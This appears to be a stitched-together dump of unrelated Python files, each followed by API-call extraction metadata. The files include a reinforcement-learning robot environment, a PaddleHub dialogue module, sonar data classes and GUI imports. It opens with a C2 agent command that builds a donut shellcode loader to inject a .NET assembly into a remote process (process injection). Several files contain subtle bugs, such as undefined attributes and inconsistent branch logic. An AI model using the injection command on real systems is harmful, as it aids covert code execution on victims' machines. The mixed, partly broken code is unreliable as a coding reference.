raise Exception("Invalid number of arguments.\n\tUsage: {}".format(AssemblyInjectCommand.help_cmd))
pid = parts[0]
assembly_name = parts[1]
assembly_args = ""
assembly_args = ""
if len(parts) > 2:
assembly_args = parts[2]
self.args["pid"].value = pid
self.args["assembly_name"].value = assembly_name
self.args["assembly_arguments"].value = assembly_args
class AssemblyInjectCommand(CommandBase):
cmd = "assembly_inject"
needs_admin = False
help_cmd = "assembly_inject [pid] [assembly] [args]"
description = "Inject the unmanaged assembly loader into a remote process. The loader will then execute the .NET binary in the context of the injected process."
version = 2
is_exit = False
is_file_browse = False
is_process_list = False
is_download_file = False
is_upload_file = False
is_remove_file = False
author = "@djhohnstein"
argument_class = AssemblyInjectArguments
attackmapping = ["T1055"]
async def create_tasking(self, task: MythicTask) -> MythicTask:
arch = task.args.get_arg("arch")
pipe_name = str(uuid4())
task.args.add_arg("pipe_name", pipe_name)
exePath = "/srv/ExecuteAssembly.exe"
donutPic = donut.create(file=exePath, params=task.args.get_arg("pipe_name"))
file_resp = await MythicRPC().execute("create_file",
task_id=task.id,
file=base64.b64encode(donutPic).decode(),
delete_after_fetch=True)
if file_resp.status == MythicStatus.Success:
task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
else:
raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)
task.args.remove_arg("arch")
return task
async def process_response(self, response: AgentResponse):
pass
| [
"base64.b64encode",
"uuid.uuid4"
] | [((2238, 2245), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (2243, 2245), False, 'from uuid import uuid4\n'), ((2602, 2628), 'base64.b64encode', 'base64.b64encode', (['donutPic'], {}), '(donutPic)\n', (2618, 2628), False, 'import base64\n')] |
'''
Created on 4 Feb 2022
@author: ucacsjj
'''
import random
from enum import Enum
import numpy as np
from gym import Env, spaces
from .robot_states_and_actions import *
# This environment affords a much lower level control of the robot than the
# battery environment. It is partially inspired by the AI Gymn Frozen Lake
# example.
class RecyclingRobotEnvironment(Env):
def __init__(self):
# The action space
self.action_space = spaces.Discrete(RobotActions.NUMBER_OF_ACTIONS)
self.observation_space = spaces.Discrete(RobotBatteryState.NUMBER_OF_STATES)
# Values
# Probability of discharging high => medium
self._alpha = 0.4
# Probability of discharging medium => low
self._beta = 0.1
# Probability of discharging low => discharged
self._gamma = 0.1
# Probability of charging up a level low => medium, medium => high
self._delta = 0.9
self._r_search = 10
self._r_wait = 5
self._r_charge = 0
self._r_discharged = -20
# State transition table. The dictionary consists of (s, a) values. The
# value is a tuple which is the conditional value of the probabilities of
# DISCHARGED, LOW, MEDIUM, HIGH, conditioned on s and a.
self._state_transition_table = {
# New state when a=SEARCH
(RobotBatteryState.HIGH, RobotActions.SEARCH) : \
(0, self._alpha / 3, 2 * self._alpha / 3, 1 - self._alpha),
(RobotBatteryState.MEDIUM, RobotActions.SEARCH) : \
(0, self._beta, 1 - self._beta, 0),
(RobotBatteryState.LOW, RobotActions.SEARCH) : \
(self._gamma, 1 - self._gamma, 0 , 0),
(RobotBatteryState.DISCHARGED, RobotActions.SEARCH) : \
(0, 0, 0, 0),
# a = WAIT
(RobotBatteryState.HIGH, RobotActions.WAIT) : \
(0, 0, 0, 1),
(RobotBatteryState.MEDIUM, RobotActions.WAIT) : \
(0, 0 ,1, 0),
(RobotBatteryState.LOW, RobotActions.WAIT) : \
(0, 1, 0, 0),
(RobotBatteryState.DISCHARGED, RobotActions.WAIT) : \
(0, 0, 0, 0),
# a = RECHARGE
(RobotBatteryState.HIGH, RobotActions.RECHARGE) : \
(0, 0, 0, 1),
(RobotBatteryState.MEDIUM, RobotActions.RECHARGE) : \
(0, 0, 1 - self._delta, self._delta),
(RobotBatteryState.LOW, RobotActions.RECHARGE) : \
(0, 1 - self._delta, self._delta, 0),
(RobotBatteryState.DISCHARGED, RobotActions.RECHARGE) : \
(0, 0, 0, 0)
}
# The rewards. In this case, they are only a function of the actions
# and not the state.
self._action_reward_table = {
RobotActions.SEARCH : self._r_search,
RobotActions.WAIT: self._r_wait,
RobotActions.RECHARGE: self._r_charge,
RobotActions.TERMINATE: self._r_discharged
}
# Reset to the initial state
self.reset()
# Reset the scenario to the initial state
def reset(self):
self._battery_state = RobotBatteryState.HIGH
# Reset the initial value function
def initial_value_function(self):
v_initial = np.zeros(RobotBatteryState.NUMBER_OF_STATES)
v_initial[RobotBatteryState.DISCHARGED] = self._r_discharged
return v_initial
# An initial random policy under consideration
def initial_policy(self):
pi_initial = {
RobotBatteryState.HIGH: (0, 1/3, 1/3, 1/3),
RobotBatteryState.MEDIUM: (0, 1/3, 1/3, 1/3),
RobotBatteryState.LOW: (0, 1/3, 1/3, 1/3)}
return pi_initial
def step(self, action):
# From the (s, a) pair, get the appropriate row in the table
transition_key = (self._battery_state, action)
# Sanity check
assert transition_key in self._state_transition_table
# Get the state transition probabilities and rewards
p = self._state_transition_table[transition_key]
r = self._reward_table[transition_key]
print(str(self._battery_state) + ":" + str(p) + str(r))
# Work out the state transition
sample = random.random()
done = False
# Probability of transitioning to high state
if sample < p[0]:
self._battery_state = RobotBatteryState.HIGH
reward = r[0]
elif sample < p[0] + p[1]:
self._battery_state = RobotBatteryState.MEDIUM
reward = r[1]
elif sample < p[0] + p[1] + p[2]:
self._battery_state = RobotBatteryState.LOW
reward = r[2]
if sample < p[0] + p[1] + p[2] + p[3]:
self._battery_state = RobotBatteryState.DISCHARGED
reward = r[3]
done = True
return self._battery_state, reward, done, {}
# Return the state, reward and probability distributions
def next_state_and_reward_distribution(self, state, action):
# From the (s, a) pair, get the appropriate row in the table
transition_key = (state, action)
# Sanity check
#print(transition_key)
assert transition_key in self._state_transition_table
s_prime = [RobotBatteryState.DISCHARGED, RobotBatteryState.LOW, \
RobotBatteryState.MEDIUM, RobotBatteryState.HIGH]
# Get the state transition probabilities and rewards
p = self._state_transition_table[transition_key]
#r = self._reward_table[transition_key]
r = self._action_reward_table[action]
return s_prime, r, p
| [
"random.random",
"numpy.zeros",
"gym.spaces.Discrete"
] | [((457, 504), 'gym.spaces.Discrete', 'spaces.Discrete', (['RobotActions.NUMBER_OF_ACTIONS'], {}), '(RobotActions.NUMBER_OF_ACTIONS)\n', (472, 504), False, 'from gym import Env, spaces\n'), ((547, 598), 'gym.spaces.Discrete', 'spaces.Discrete', (['RobotBatteryState.NUMBER_OF_STATES'], {}), '(RobotBatteryState.NUMBER_OF_STATES)\n', (562, 598), False, 'from gym import Env, spaces\n'), ((3664, 3708), 'numpy.zeros', 'np.zeros', (['RobotBatteryState.NUMBER_OF_STATES'], {}), '(RobotBatteryState.NUMBER_OF_STATES)\n', (3672, 3708), True, 'import numpy as np\n'), ((4706, 4721), 'random.random', 'random.random', ([], {}), '()\n', (4719, 4721), False, 'import random\n')] |
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import os
import json
import sys
import argparse
import contextlib
from collections import namedtuple
import paddle.fluid as fluid
import paddlehub as hub
from paddlehub.module.module import runnable
from paddlehub.module.nlp_module import DataFormatError
from paddlehub.common.logger import logger
from paddlehub.module.module import moduleinfo, serving
import plato2_en_base.models as plato_models
from plato2_en_base.tasks.dialog_generation import DialogGeneration
from plato2_en_base.utils import check_cuda, Timer
from plato2_en_base.utils.args import parse_args
@moduleinfo(
name="plato2_en_base",
version="1.0.0",
summary=
"A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling.",
author="baidu-nlp",
author_email="",
type="nlp/text_generation",
)
class Plato(hub.NLPPredictionModule):
def _initialize(self):
"""
initialize with the necessary elements
"""
if "CUDA_VISIBLE_DEVICES" not in os.environ:
raise RuntimeError("The module only support GPU. Please set the environment variable CUDA_VISIBLE_DEVICES.")
args = self.setup_args()
self.task = DialogGeneration(args)
self.model = plato_models.create_model(args, fluid.CUDAPlace(0))
self.Example = namedtuple("Example", ["src", "data_id"])
self._interactive_mode = False
def setup_args(self):
"""
Setup arguments.
"""
assets_path = os.path.join(self.directory, "assets")
vocab_path = os.path.join(assets_path, "vocab.txt")
init_pretraining_params = os.path.join(assets_path, "24L", "Plato")
spm_model_file = os.path.join(assets_path, "spm.model")
nsp_inference_model_path = os.path.join(assets_path, "24L", "NSP")
config_path = os.path.join(assets_path, "24L.json")
# ArgumentParser.parse_args use argv[1:], it will drop the first one arg, so the first one in sys.argv should be ""
sys.argv = [
"", "--model", "Plato", "--vocab_path",
"%s" % vocab_path, "--do_lower_case", "False", "--init_pretraining_params",
"%s" % init_pretraining_params, "--spm_model_file",
"%s" % spm_model_file, "--nsp_inference_model_path",
"%s" % nsp_inference_model_path, "--ranking_score", "nsp_score", "--do_generation", "True", "--batch_size",
"1", "--config_path",
"%s" % config_path
]
parser = argparse.ArgumentParser()
plato_models.add_cmdline_args(parser)
DialogGeneration.add_cmdline_args(parser)
args = parse_args(parser)
args.load(args.config_path, "Model")
args.run_infer = True # only build infer program
return args
@serving
def generate(self, texts):
"""
Get the robot responses of the input texts.
Args:
texts(list or str): If not in the interactive mode, texts should be a list in which every element is the chat context separated with '\t'.
Otherwise, texts shoule be one sentence. The module can get the context automatically.
Returns:
results(list): the robot responses.
"""
if not texts:
return []
if self._interactive_mode:
if isinstance(texts, str):
self.context.append(texts.strip())
texts = [" [SEP] ".join(self.context[-self.max_turn:])]
else:
raise ValueError("In the interactive mode, the input data should be a string.")
elif not isinstance(texts, list):
raise ValueError("If not in the interactive mode, the input data should be a list.")
bot_responses = []
for i, text in enumerate(texts):
example = self.Example(src=text.replace("\t", " [SEP] "), data_id=i)
record = self.task.reader._convert_example_to_record(example, is_infer=True)
data = self.task.reader._pad_batch_records([record], is_infer=True)
pred = self.task.infer_step(self.model, data)[0] # batch_size is 1
bot_response = pred["response"] # ignore data_id and score
bot_responses.append(bot_response)
if self._interactive_mode:
self.context.append(bot_responses[0].strip())
return bot_responses
@contextlib.contextmanager
def interactive_mode(self, max_turn=6):
"""
Enter the interactive mode.
Args:
max_turn(int): the max dialogue turns. max_turn = 1 means the robot can only remember the last one utterance you have said.
"""
self._interactive_mode = True
self.max_turn = max_turn
self.context = []
yield
self.context = []
self._interactive_mode = False
@runnable
def run_cmd(self, argvs):
"""
Run as a command
"""
self.parser = argparse.ArgumentParser(
description='Run the %s module.' % self.name,
prog='hub run %s' % self.name,
usage='%(prog)s',
add_help=True)
self.arg_input_group = self.parser.add_argument_group(title="Input options", description="Input data. Required")
self.arg_config_group = self.parser.add_argument_group(
title="Config options", description="Run configuration for controlling module behavior, optional.")
self.add_module_input_arg()
args = self.parser.parse_args(argvs)
try:
input_data = self.check_input_data(args)
except DataFormatError and RuntimeError:
self.parser.print_help()
return None
results = self.generate(texts=input_data)
return results
if __name__ == "__main__":
module = Plato()
for result in module.generate(["Hello", "Hello\thi, nice to meet you, my name is tom\tso your name is tom?"]):
print(result)
with module.interactive_mode(max_turn=3):
while True:
human_utterance = input()
robot_utterance = module.generate(human_utterance)
print("Robot: %s" % robot_utterance[0])
| [
"collections.namedtuple",
"plato2_en_base.tasks.dialog_generation.DialogGeneration",
"paddlehub.module.module.moduleinfo",
"argparse.ArgumentParser",
"plato2_en_base.models.add_cmdline_args",
"os.path.join",
"plato2_en_base.tasks.dialog_generation.DialogGeneration.add_cmdline_args",
"paddle.fluid.CUDA... | [((1207, 1478), 'paddlehub.module.module.moduleinfo', 'moduleinfo', ([], {'name': '"""plato2_en_base"""', 'version': '"""1.0.0"""', 'summary': '"""A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling."""', 'author': '"""baidu-nlp"""', 'author_email': '""""""', 'type': '"""nlp/text_generation"""'}), "(name='plato2_en_base', version='1.0.0', summary=\n 'A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling.'\n , author='baidu-nlp', author_email='', type='nlp/text_generation')\n", (1217, 1478), False, 'from paddlehub.module.module import moduleinfo, serving\n'), ((1865, 1887), 'plato2_en_base.tasks.dialog_generation.DialogGeneration', 'DialogGeneration', (['args'], {}), '(args)\n', (1881, 1887), False, 'from plato2_en_base.tasks.dialog_generation import DialogGeneration\n'), ((1984, 2025), 'collections.namedtuple', 'namedtuple', (['"""Example"""', "['src', 'data_id']"], {}), "('Example', ['src', 'data_id'])\n", (1994, 2025), False, 'from collections import namedtuple\n'), ((2163, 2201), 'os.path.join', 'os.path.join', (['self.directory', '"""assets"""'], {}), "(self.directory, 'assets')\n", (2175, 2201), False, 'import os\n'), ((2223, 2261), 'os.path.join', 'os.path.join', (['assets_path', '"""vocab.txt"""'], {}), "(assets_path, 'vocab.txt')\n", (2235, 2261), False, 'import os\n'), ((2296, 2337), 'os.path.join', 'os.path.join', (['assets_path', '"""24L"""', '"""Plato"""'], {}), "(assets_path, '24L', 'Plato')\n", (2308, 2337), False, 'import os\n'), ((2363, 2401), 'os.path.join', 'os.path.join', (['assets_path', '"""spm.model"""'], {}), "(assets_path, 'spm.model')\n", (2375, 2401), False, 'import os\n'), ((2437, 2476), 'os.path.join', 'os.path.join', (['assets_path', '"""24L"""', '"""NSP"""'], {}), "(assets_path, '24L', 'NSP')\n", (2449, 2476), False, 'import os\n'), ((2499, 2536), 'os.path.join', 'os.path.join', (['assets_path', '"""24L.json"""'], {}), "(assets_path, '24L.json')\n", (2511, 2536), False, 'import os\n'), ((3165, 3190), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (3188, 3190), False, 'import argparse\n'), ((3199, 3236), 'plato2_en_base.models.add_cmdline_args', 'plato_models.add_cmdline_args', (['parser'], {}), '(parser)\n', (3228, 3236), True, 'import plato2_en_base.models as plato_models\n'), ((3245, 3286), 'plato2_en_base.tasks.dialog_generation.DialogGeneration.add_cmdline_args', 'DialogGeneration.add_cmdline_args', (['parser'], {}), '(parser)\n', (3278, 3286), False, 'from plato2_en_base.tasks.dialog_generation import DialogGeneration\n'), ((3302, 3320), 'plato2_en_base.utils.args.parse_args', 'parse_args', (['parser'], {}), '(parser)\n', (3312, 3320), False, 'from plato2_en_base.utils.args import parse_args\n'), ((5635, 5773), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': "('Run the %s module.' % self.name)", 'prog': "('hub run %s' % self.name)", 'usage': '"""%(prog)s"""', 'add_help': '(True)'}), "(description='Run the %s module.' % self.name, prog=\n 'hub run %s' % self.name, usage='%(prog)s', add_help=True)\n", (5658, 5773), False, 'import argparse\n'), ((1941, 1959), 'paddle.fluid.CUDAPlace', 'fluid.CUDAPlace', (['(0)'], {}), '(0)\n', (1956, 1959), True, 'import paddle.fluid as fluid\n')] |
# Compute the distance between all the points on a sphere and a
# plane.
#
import pyvista as pv
sphere = pv.Sphere()
plane = pv.Plane()
_ = sphere.compute_implicit_distance(plane, inplace=True)
dist = sphere['implicit_distance']
type(dist)
# Expected:
## <class 'numpy.ndarray'>
#
# Plot these distances as a heatmap
#
pl = pv.Plotter()
_ = pl.add_mesh(sphere, scalars='implicit_distance', cmap='bwr')
_ = pl.add_mesh(plane, color='w', style='wireframe')
pl.show()
#
# See :ref:`clip_with_surface_example` and
# :ref:`voxelize_surface_mesh_example` for more examples using
| [
"pyvista.Plane",
"pyvista.Plotter",
"pyvista.Sphere"
] | [((105, 116), 'pyvista.Sphere', 'pv.Sphere', ([], {}), '()\n', (114, 116), True, 'import pyvista as pv\n'), ((125, 135), 'pyvista.Plane', 'pv.Plane', ([], {}), '()\n', (133, 135), True, 'import pyvista as pv\n'), ((324, 336), 'pyvista.Plotter', 'pv.Plotter', ([], {}), '()\n', (334, 336), True, 'import pyvista as pv\n')] |
# -*- coding: utf-8 -*-
# 系统模块
import sys
# 数据处理模块
import pandas as pd
# 引入外部模块
# 整理数据
from predict_prepare import Predict_Prepare as Prepare
# 获取价格预测结果
from predict_predict import Predict_Predict as Predict
class Predict_Lead:
def __init__(self):
pass
# 其他包调用的函数
def predict_result(self):
# 模型分两段进行预测
period = [1, 2]
# 实例化准备模块和模型预测模块
PrePare_Data = Prepare()
Predict_Data = Predict()
# 获得第一段时间的预测结果
# 整理样本数据集,进行模型预测准备工作
# History_Model11、Predict_Model11:生猪预测模型所需使用的自变量和因变量
# Last_data_model11:原始数据集中生猪价格的最后一条记录的时间
# History_Model21、Predict_Model21:玉米预测模型所需使用的自变量和因变量
# Last_data_model21:原始数据集中玉米价格的最后一条记录的时间
History_Model11, Predict_Model11, Last_data_model11, History_Model21, Predict_Model21, Last_data_model21 = PrePare_Data.variables_prepar(period[0])
# 获取预测结果
# predict_result1:生猪价格和玉米价格的预测结果
# y_test_compare11:第一时间段中生猪模型训练结果和实际价格的集合
# y_test_compare12:第一时间段中玉米模型训练结果和实际价格的集合
predict_result1, y_test_compare11, y_test_compare12 = Predict_Data.predict_result(History_Model11, Last_data_model11, Predict_Model11, History_Model21, Last_data_model21, Predict_Model21, period[0])
# 获得第二段时间的预测结果
# 整理样本数据集,进行模型预测准备工作
History_Model12, Predict_Model12, Last_data_model12, History_Model22, Predict_Model22, Last_data_model22 = PrePare_Data.variables_prepar(period[1])
# 获取预测结果
predict_result2, y_test_compare21, y_test_compare22 = Predict_Data.predict_result(History_Model12, Last_data_model12, Predict_Model12, History_Model22, Last_data_model22, Predict_Model22, period[1])
# 整合两端时间的预测结果
predict_result = pd.concat([predict_result1, predict_result2])
predict_result = predict_result.reset_index(drop=True)
return predict_result, Last_data_model11, y_test_compare11, y_test_compare12
| [
"predict_predict.Predict_Predict",
"predict_prepare.Predict_Prepare",
"pandas.concat"
] | [((408, 417), 'predict_prepare.Predict_Prepare', 'Prepare', ([], {}), '()\n', (415, 417), True, 'from predict_prepare import Predict_Prepare as Prepare\n'), ((441, 450), 'predict_predict.Predict_Predict', 'Predict', ([], {}), '()\n', (448, 450), True, 'from predict_predict import Predict_Predict as Predict\n'), ((1752, 1797), 'pandas.concat', 'pd.concat', (['[predict_result1, predict_result2]'], {}), '([predict_result1, predict_result2])\n', (1761, 1797), True, 'import pandas as pd\n')] |
from distutils.core import setup
setup(
name='als',
packages=['als'],
version='0.0.2',
description='Python library for Alternating Least Squares (ALS)',
author='<NAME>',
author_email='<EMAIL>',
url='https://github.com/ruivieira/python-als',
download_url='https://github.com/'
'ruivieira/python-als/archive/0.0.2.tar.gz',
keywords=['als', 'recommendation', 'scientific', 'machine-learning', 'models'],
classifiers=[],
)
| [
"distutils.core.setup"
] | [((34, 439), 'distutils.core.setup', 'setup', ([], {'name': '"""als"""', 'packages': "['als']", 'version': '"""0.0.2"""', 'description': '"""Python library for Alternating Least Squares (ALS)"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/ruivieira/python-als"""', 'download_url': '"""https://github.com/ruivieira/python-als/archive/0.0.2.tar.gz"""', 'keywords': "['als', 'recommendation', 'scientific', 'machine-learning', 'models']", 'classifiers': '[]'}), "(name='als', packages=['als'], version='0.0.2', description=\n 'Python library for Alternating Least Squares (ALS)', author='<NAME>',\n author_email='<EMAIL>', url='https://github.com/ruivieira/python-als',\n download_url=\n 'https://github.com/ruivieira/python-als/archive/0.0.2.tar.gz',\n keywords=['als', 'recommendation', 'scientific', 'machine-learning',\n 'models'], classifiers=[])\n", (39, 439), False, 'from distutils.core import setup\n')] |
# coding=utf-8
# National Oceanic and Atmospheric Administration (NOAA)
# Alaskan Fisheries Science Center (AFSC)
# Resource Assessment and Conservation Engineering (RACE)
# Midwater Assessment and Conservation Engineering (MACE)
# THIS SOFTWARE AND ITS DOCUMENTATION ARE CONSIDERED TO BE IN THE PUBLIC DOMAIN
# AND THUS ARE AVAILABLE FOR UNRESTRICTED PUBLIC USE. THEY ARE FURNISHED "AS IS."
# THE AUTHORS, THE UNITED STATES GOVERNMENT, ITS INSTRUMENTALITIES, OFFICERS,
# EMPLOYEES, AND AGENTS MAKE NO WARRANTY, EXPRESS OR IMPLIED, AS TO THE USEFULNESS
# OF THE SOFTWARE AND DOCUMENTATION FOR ANY PURPOSE. THEY ASSUME NO RESPONSIBILITY
# (1) FOR THE USE OF THE SOFTWARE AND DOCUMENTATION; OR (2) TO PROVIDE TECHNICAL
# SUPPORT TO USERS.
"""
| Developed by: <NAME> <<EMAIL>>
| National Oceanic and Atmospheric Administration (NOAA)
| Alaska Fisheries Science Center (AFSC)
| Midwater Assesment and Conservation Engineering Group (MACE)
|
| Author:
| <NAME> <<EMAIL>>
| Maintained by:
| <NAME> <<EMAIL>>
"""
import numpy as np
class bottom_data(object):
'''
The bottom_data class stores data from TAG0 datagrams in Simrad raw files.
It may be useful if other sonar file types have a similar annotation
'''
CHUNK_SIZE = 500
def __init__(self, channel_id):
# Create a counter to keep track of the number of datagrams.
self.n_datagrams = 0
# set the channel ID
self.channel_id = channel_id
# Create arrays to store MRU0 data
self.times = np.empty(bottom_data.CHUNK_SIZE, dtype='datetime64[ms]')
self.annotation_text = np.empty(bottom_data.CHUNK_SIZE, dtype=object)
def add_datagram(self, time, annotation_datagram):
"""
Add annotation text
Args:
annotation_datagram (dict) - The motion datagram dictionary returned by
the simrad datagram parser.
"""
# Check if we need to resize our arrays.
if self.n_datagrams == self.annotation_times.shape[0]:
self._resize_arrays(self.annotation_times.shape[0] + annotation_data.CHUNK_SIZE)
# Add this datagram to our data arrays
self.annotation_times[self.n_datagrams] = annotation_datagram['timestamp']
self.annotation_text[self.n_datagrams] = annotation_datagram['text']
# Increment datagram counter.
self.n_datagrams += 1
def interpolate(self, p_data, data_type, start_time=None, end_time=None):
"""
interpolate returns the requested motion data interpolated to the ping times
that are present in the provided ping_data object.
p_data is a ping_data object that contains the ping_time vector
to interpolate to.
data_type is a string pecifying the motion attribute to interpolate, valid
values are: 'pitch', 'heave', 'roll', and 'heading'
start_time is a datetime or datetime64 object defining the starting time of the data
to return. If None, the start time is the earliest time.
end_time is a datetime or datetime64 object defining the ending time of the data
to return. If None, the end time is the latest time.
attributes is a string or list of strings specifying the motion attribute(s)
to interpolate and return. If None, all attributes are interpolated
and returned.
Returns a dictionary of numpy arrays keyed by attribute name that contain the
interpolated data for that attribute.
"""
# Create the dictionary to return
out_data = {}
# Return an empty dict if we don't contain any data
if self.n_datagrams < 1:
return out_data
# Get the index for all datagrams within the time span.
return_idxs = self.get_indices(start_time=start_time, end_time=end_time)
# Check if we're been given specific attributes to interpolate
if data_type is None:
# No - interpolate all
attributes = ['heave', 'pitch', 'roll', 'heading']
elif isinstance(data_type, str):
# We have a string, put it in a list
attributes = [data_type]
# Work through the attributes and interpolate
for attribute in attributes:
try:
# Interpolate this attribute using the time vector in the
# provided ping_data object
i_data = np.interp(p_data.ping_time.astype('d'),
self.time.astype('d'), getattr(self, attribute),
left=np.nan, right=np.nan)
out_data[attribute] = i_data[return_idxs]
except:
# Provided attribute doesn't exist
out_data[attribute] = None
return (attributes, out_data)
def get_indices(self, start_time=None, end_time=None, time_order=True):
"""
Return index of data contained in speciofied time range.
get_indices returns an index array containing the indices contained
in the range defined by the times provided. By default the indexes
are in time order.
Args:
start_time is a datetime or datetime64 object defining the starting
time of the data to return. If None, the start time is the
earliest time.
end_time is a datetime or datetime64 object defining the ending time
of the data to return. If None, the end time is the latest time.
time_order (bool): Control whether if indexes are returned in time
order (True) or not.
Returns: Index array containing indices of data to return.
"""
# Ensure that we have times to work with.
if start_time is None:
start_time = np.min(self.time)
if end_time is None:
end_time = np.max(self.time)
# Sort time index if returning time ordered indexes.
if time_order:
primary_index = self.time.argsort()
else:
primary_index = self.time
# Determine the indices of the data that fall within the time span
# provided.
mask = self.time[primary_index] >= start_time
mask = np.logical_and(mask, self.time[primary_index] <= end_time)
# and return the indices that are included in the specified range
return primary_index[mask]
def _resize_arrays(self, new_size):
"""
Resize arrays if needed to hold more data.
_resize_arrays expands our data arrays and is called when said arrays
are filled with data and more data need to be added.
Args:
new_size (int): New size for arrays, Since these are all 1d
arrays the value is simply an integer.
"""
self.time = np.resize(self.time,(new_size))
self.pitch = np.resize(self.pitch,(new_size))
self.roll = np.resize(self.roll,(new_size))
self.heading = np.resize(self.heading,(new_size))
self.heave = np.resize(self.heave,(new_size))
def trim(self):
"""
Trim arrays to proper size after all data are added.
trim is called when one is done adding data to the object. It
removes empty elements of the data arrays.
"""
self._resize_arrays(self.n_datagrams)
def __str__(self):
"""
Reimplemented string method that provides some basic info about the
nmea_data object.
"""
# print the class and address
msg = str(self.__class__) + " at " + str(hex(id(self))) + "\n"
# print some more info about the motion_data instance
if (self.n_datagrams > 0):
msg = "{0} MRU data start time: {1}\n".format(msg, self.time[0])
msg = "{0} MRU data end time: {1}\n".format(msg,self.time[self.n_datagrams-1])
msg = "{0} Number of datagrams: {1}\n".format(msg,self.n_datagrams+1)
else:
msg = msg + (" simrad_motion_data object contains no data\n")
return msg
| [
"numpy.logical_and",
"numpy.max",
"numpy.resize",
"numpy.empty",
"numpy.min"
] | [((1558, 1614), 'numpy.empty', 'np.empty', (['bottom_data.CHUNK_SIZE'], {'dtype': '"""datetime64[ms]"""'}), "(bottom_data.CHUNK_SIZE, dtype='datetime64[ms]')\n", (1566, 1614), True, 'import numpy as np\n'), ((1646, 1692), 'numpy.empty', 'np.empty', (['bottom_data.CHUNK_SIZE'], {'dtype': 'object'}), '(bottom_data.CHUNK_SIZE, dtype=object)\n', (1654, 1692), True, 'import numpy as np\n'), ((6366, 6424), 'numpy.logical_and', 'np.logical_and', (['mask', '(self.time[primary_index] <= end_time)'], {}), '(mask, self.time[primary_index] <= end_time)\n', (6380, 6424), True, 'import numpy as np\n'), ((6953, 6983), 'numpy.resize', 'np.resize', (['self.time', 'new_size'], {}), '(self.time, new_size)\n', (6962, 6983), True, 'import numpy as np\n'), ((7006, 7037), 'numpy.resize', 'np.resize', (['self.pitch', 'new_size'], {}), '(self.pitch, new_size)\n', (7015, 7037), True, 'import numpy as np\n'), ((7059, 7089), 'numpy.resize', 'np.resize', (['self.roll', 'new_size'], {}), '(self.roll, new_size)\n', (7068, 7089), True, 'import numpy as np\n'), ((7114, 7147), 'numpy.resize', 'np.resize', (['self.heading', 'new_size'], {}), '(self.heading, new_size)\n', (7123, 7147), True, 'import numpy as np\n'), ((7170, 7201), 'numpy.resize', 'np.resize', (['self.heave', 'new_size'], {}), '(self.heave, new_size)\n', (7179, 7201), True, 'import numpy as np\n'), ((5928, 5945), 'numpy.min', 'np.min', (['self.time'], {}), '(self.time)\n', (5934, 5945), True, 'import numpy as np\n'), ((5998, 6015), 'numpy.max', 'np.max', (['self.time'], {}), '(self.time)\n', (6004, 6015), True, 'import numpy as np\n')] |
from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp
from View.Painel import painelSensores, painelControladores, painelConexao
from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit
# Abre as telas da aba de seleção
def AbreTelaNovoProjeto(tela):
telaNovoProjeto.TelaNovoProjeto(tela)
def AbreTelaAbrirProjeto(tela):
telaAbrirProjeto.TelaAbrirProjeto(tela)
def AbreTelaRelatorio(tela):
telaRelatorio.TelaRelatorio(tela)
def AbreTelaCadastro(tela):
telaCadastro.TelaCadastro(tela)
def AbreTelaConfigura(tela):
telaConfigura.TelaConfigura(tela)
def AbreTelaConexao(tela):
telaConexao.TelaConexao(tela)
# Abre telas de conexões de atuadores
def AbreTelaConAnAn(tela):
telaConAnalogAnalog.TelaConAnalogAnalog(tela)
def AbreTelaConAnDig(tela):
telaConAnalogDigit.TelaConAnalogDig(tela)
def AbreTelaConDigAn(tela):
telaConDigitAnalog.TelaConDigAnalog(tela)
def AbreTelaConDigDig(tela):
telaConDigitDigit.TelaConDigDig(tela)
# Abre os frames das abas
def AbreFrameSensores(frame):
painelSensores.PainelSensores(frame)
def AbreFrameControladores(frame, tela):
painelControladores.PainelControladores(frame, tela)
def AbreFrameConexao(frame, tela):
painelConexao.PainelConexao(frame, tela)
# Abre telas de edição da conexão e controladores
def AbreEditorControlador(tela, controle):
telaEditarControle.TelaEditarControle(tela, controle)
# Abre telas de PopUP
def AbrePopUp(tela, mensagem):
telaPopUp.TelaPopUp(tela, mensagem) | [
"View.telaPopUp.TelaPopUp",
"View.telaNovoProjeto.TelaNovoProjeto",
"View.telaAbrirProjeto.TelaAbrirProjeto",
"View.telaConexao.TelaConexao",
"View.Conexao.telaConDigitDigit.TelaConDigDig",
"View.Painel.painelSensores.PainelSensores",
"View.Conexao.telaConDigitAnalog.TelaConDigAnalog",
